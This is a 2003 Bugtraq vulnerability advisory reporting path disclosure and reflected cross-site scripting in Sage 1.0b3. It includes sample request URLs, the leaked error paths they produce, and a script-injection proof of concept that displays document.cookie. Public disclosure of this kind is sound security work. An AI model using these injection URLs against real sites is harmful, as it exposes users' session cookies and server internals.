[28952] in bugtraq
XSS and Path Disclosure in Sage
daemon@ATHENA.MIT.EDU (euronymous)
Thu Feb 20 11:09:50 2003
Date: Thu, 20 Feb 2003 01:21:47 +0300 (MSK)
From: "euronymous" <just-a-user@yandex.ru>
Reply-To: just-a-user@yandex.ru
Message-Id: <3E54037B.00000E.08051@soapbox.yandex.ru>
MIME-Version: 1.0
Errors-To: just-a-user@yandex.ru
To: bugtraq@securityfocus.com, vuln@security.nnov.ru
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: 7bit
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: XSS and Path Disclosure in Sage
product: Sage 1.0b3
vendor: http://sage.dev.box.sk/
risk: middle
date: 02/20/2k3
discovered by: euronymous /f0kp /r00tc0de
advisory urls: http://f0kp.iplus.ru/bz/015.en.txt
http://f0kp.iplus.ru/bz/015.ru.txt
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
description
-----------
1) path disclosure
u can view full system path with two ways:
http://hostname/?mod=some_thing&op=browse
where `some_thing' is a nonexistent module name
===================================================
Fatal error: Cannot instantiate non-existent class:
module_some_thing
in /home/aztek/libraries/module.inc.php on line 62
===================================================
other method is:
http://hostname/?mod=node&nid=some_thing&op=view
===================================================
Access Denied
/home/aztek/modules/node.module.php:71
===================================================
2) cross-site scripting
becouse $mod is not checks correctly, u can to insert
html, javascript, etc in script output:
http://hostname/?mod=<script>alert(document.cookie)</script>&op=browse
shouts: r00tc0de.net, DWC, DHG, security.nnov.ru, all
russian security guyz!! and kate for being a kewl girl ))
fsck_off: slavomira and other dirty ppl in *.kz
================
im not a lame,
not yet a hacker
================
